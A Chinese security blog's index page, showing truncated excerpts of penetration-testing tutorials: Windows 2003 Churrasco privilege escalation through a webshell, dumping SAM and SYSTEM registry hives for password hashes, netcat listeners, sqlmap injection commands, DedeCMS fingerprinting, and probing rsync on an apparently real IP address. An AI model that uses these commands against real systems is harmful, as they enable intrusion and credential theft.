天天小站

2020-08-18pppooo137阅读(144)

第一部分：巴西烤肉提权 首先明白：Churrasco.exe是Windows2003系统下的一个本地提权漏洞，只有这个系统可以用巴西烤肉提权。 1.  大马检测一下脚本是否支持wscript.shell 如下图，检测结果是支持。 2.  支...

2020-08-18pppooo137阅读(86)

1.   执行下面命令可以查看当前服务器哪些补丁没有打，下面代码中是三行，将三行改为一行再使用（这里写三行目的是显示出来，不然显示不全，复制代码到txt文档，然后删除回车改为一行即可。） systeminfo>micropoor.tx...

2020-08-16pppooo137阅读(115)

下载地址：https://eternallybored.org/misc/netcat/  下载1.1.2 ，下载后解压。 将 解压后的里面的 nc.exe ，复制，粘贴到 C:\Users\Administrator  下如果你使用的用户...

2020-08-09pppooo137阅读(135)

Windows server 2003抓HASH reg save hklm\sam c:\sam.hive reg save hklm\system c:\system.hive reg save hklm\security c:\sec...

2020-08-05pppooo137阅读(154)

1. 查看哪些版本存在漏洞： 在kali中输入命令：   searchsploit rsync 该漏洞存在于 873 端口 2. 测试漏洞是否存在： 在kali中输入：  rsync 59.188.219.28::       &...

2020-08-03pppooo137阅读(187)

1.  判断升级时间：  /data/admin/ver.txt 2. 判断版本 /plus/guestbook.php 查看底部版权。 3. 判断是不是dede佐证  data/admin/allowurl.txt 4. 判断后台路径  ...

2020-08-03pppooo137阅读(184)

1. 全面检测注入 第一部分：检测注入 1. sqlmap -u "http://www.xxxxxx.com/Newsshow.asp?id=1" //默认使用level1检测全部数据库类型 2. sqlmap -u "http://ww...

2020-08-01pppooo137阅读(125)

转载请著名来源：天天小站 » OpenVAS 使用教程

2020-08-01pppooo137阅读(166)

appscan 发现此漏洞，查找资料后总结如下： 1.  nc 建立本地监听 nc -l -p 8090 //-l的意思是使用监听模式，管控传入的资料。 -p 则是指定端口。 本机ip地址为  192.168.226.130 ,那么payl...

2020-07-30pppooo137阅读(105)

一、DNS历史解析记录 (1. )iphistory：        https://viewdns.info/iphistory/ (2.) DNS查询(收费)：  https://dnsdb.io/zh-cn/ (3.) 微步在线(注册...